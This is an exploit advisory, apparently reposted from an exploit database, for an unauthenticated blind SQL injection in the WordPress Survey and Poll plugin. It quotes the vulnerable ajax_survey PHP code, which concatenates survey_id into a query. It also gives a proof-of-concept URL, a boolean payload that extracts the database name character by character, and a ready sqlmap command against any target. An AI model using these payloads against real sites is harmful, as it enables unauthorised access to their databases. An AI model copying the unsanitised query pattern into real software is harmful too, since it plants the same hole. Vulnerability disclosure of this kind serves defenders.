扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 |
################################################################# # Exploit Title : WordPress Survey and poll Blind SQL Injection # Data : 2015 – 02 - 11 # Exploit Author : Securely (Yoo Hee man) # Plugin : WordPress Survey and Poll # Vender Homepage : http://modalsurvey.sympies.com # Tested On : Windows XP / sqlmap_v1.0 # Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on) 1. Detail - This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php - Settings.php file is no login cookie check - "survey_id" variable is not sanitized ################################################################# public function ajax_survey() { global $wpdb; $survey_id = ""; $survey_name = ""; $survey_start_time = ""; $survey_expiry_time = ""; $survey_global = ""; if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']); else $survey_id = ""; if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']); else $survey_name = ""; if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time'])); else $survey_start_time = ""; if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time'])); else $survey_expiry_time = ""; if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']); else $survey_global = ""; if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']); else $survey_options = ""; if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']); else $survey_qa = ""; $survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE <code>id</code> = ".$survey_id); if ($_REQUEST['sspcmd']=="save") { if ($survey_check>0) { //update survey $wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id)); $wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE <code>survey_id</code> = %d",$survey_id)); $wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE <code>survey_id</code> = %d",$survey_id)); $qa_object = (array)json_decode(stripslashes($survey_qa)); $qa_array = (array)$qa_object; foreach($qa_array as $keyq=>$qr) { foreach($qr as $key=>$oa) { if ($key==0) { $wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 'id' => ($keyq+1), 'survey_id' => $survey_id, 'question' => $oa ) ); $qid = $wpdb->insert_id; } else { $oans = explode("->",$oa); $wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 'survey_id' => $survey_id, 'question_id' => ($keyq+1), 'answer' => $oans[0], 'count' => $oans[1], 'autoid' => $key ) ); } } } die("updated"); } else { //insert survey $wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 'id' => $survey_id, 'name' => $survey_name, 'options' => $survey_options, 'start_time' => $survey_start_time, 'expiry_time'=> $survey_expiry_time, 'global'=> $survey_global ) ); $qa_object = (array)json_decode(stripslashes($survey_qa)); $qa_array = (array)$qa_object; foreach($qa_array as $keyq=>$qr) { foreach($qr as $key=>$oa) { if ($key==0) { $wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 'id' => ($keyq+1), 'survey_id' => $survey_id, 'question' => $oa ) ); $qid = $wpdb->insert_id; } else { $oans = explode("->",$oa); $wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 'survey_id' => $survey_id, 'question_id' => ($keyq+1), 'answer' => $oans[0], 'autoid' => $key ) ); } } } die('success'); } ################################################################ 2. POC - http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi] - DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare] 3. Sqlmap - sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql 3. Solution: Not patched 4. Discovered By : Securely(Yoo Hee man) god2zuzu@naver.com |
体验盒子
